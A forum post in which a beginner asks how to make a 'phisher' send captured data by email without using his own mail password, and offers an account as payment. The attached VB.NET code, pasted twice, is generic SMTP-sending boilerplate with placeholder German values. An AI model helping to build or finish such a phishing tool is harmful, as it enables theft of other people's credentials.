Making a Phiser without using a Password?
Okay, fiirst off, im new to coding, and was trying to figure a way to make a phisr that doesnt need my email pass...heres the code im using for my phiser...
is there anyway to change this to just send it to the email and not have to log in (using Password?) or if sumone could make one for me, i'd be greatful and would pass u a decent CF account...thanks in advance for anyone who helps
Dim Msg As New MailMessage
Dim myCredentials As New System.Net.NetworkCredential
myCredentials.UserName = " andreas@AbSender.de"
myCredentials.Password = "Passwort des Absenders"
Msg.IsBodyHtml = False
Dim mySmtpsvr As New SmtpClient()
mySmtpsvr.Host = "smtp.web.de" ‘bei web.de
mySmtpsvr.Port = 25
mySmtpsvr.UseDefaultCredentials = False
mySmtpsvr.Credentials = myCredentials
Try
Msg.From = New MailAddress("andreas@AbSender.de")
Msg.To.Add("entchen@empfänger.de")
Msg.Subject = "Betreff"
Msg.Body = "Inhalt"
mySmtpsvr.Send(Msg)
MsgBox("E-Mail gesendet.", MsgBoxStyle.Information, Title:="Information")
Catch ex As Exception
MsgBox (Err.Number & ex.Message & ex.StackTrace.ToString) 'Falls ein Fehler auftritt wird eine MsgBox angezeigt
End Try
Dim myCredentials As New System.Net.NetworkCredential
myCredentials.UserName = " andreas@AbSender.de"
myCredentials.Password = "Passwort des Absenders"
Msg.IsBodyHtml = False
Dim mySmtpsvr As New SmtpClient()
mySmtpsvr.Host = "smtp.web.de" ‘bei web.de
mySmtpsvr.Port = 25
mySmtpsvr.UseDefaultCredentials = False
mySmtpsvr.Credentials = myCredentials
Try
Msg.From = New MailAddress("andreas@AbSender.de")
Msg.To.Add("entchen@empfänger.de")
Msg.Subject = "Betreff"
Msg.Body = "Inhalt"
mySmtpsvr.Send(Msg)
MsgBox("E-Mail gesendet.", MsgBoxStyle.Information, Title:="Information")
Catch ex As Exception
MsgBox (Err.Number & ex.Message & ex.StackTrace.ToString) 'Falls ein Fehler auftritt wird eine MsgBox angezeigt
End Try

